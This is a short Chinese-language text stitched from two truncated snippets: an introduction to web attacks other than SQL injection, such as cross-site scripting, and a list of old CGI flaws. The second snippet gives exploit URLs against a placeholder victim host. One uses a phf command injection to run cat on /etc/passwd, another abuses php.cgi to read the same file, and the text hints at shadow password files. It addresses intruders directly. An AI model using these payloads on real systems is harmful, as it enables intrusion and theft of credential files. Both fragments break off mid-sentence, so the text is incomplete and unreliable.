Part I 前言 现在网上最流行的网站攻击手段，要数得上SQL Injection了，虽然SI技术易学易用，并且容易取得较大的权限，但因其风头实在太大，现在一般稍有点安全意识的程序员都会注意到这个问题，并且通过GET方法提交的数据会被服务器记录在案，而让网管很容易找到入侵者。 非SI类攻击相对来说获得的服务器操作权限不大，但对于以获得数据为目的的入侵还是很有用的。 Part II 方法介绍 常规的非SI类攻击有如下几种： 一、 跨站脚本攻击(XSS) 跨站脚本攻击不会直接对...

一.phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:lynxhttp://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd但是我们还能找到它吗?二.php.cgi2.0beta10或更早版本的漏洞可以读nobody权限的所有文件.lynxhttp://www.victim.com/cgi-bin/php.cgi?/etc/passwdphp.cgi2.1版本的只能读shtml文件了.对于密码文件,同志们要注意一下,也许可能在/etc/maste...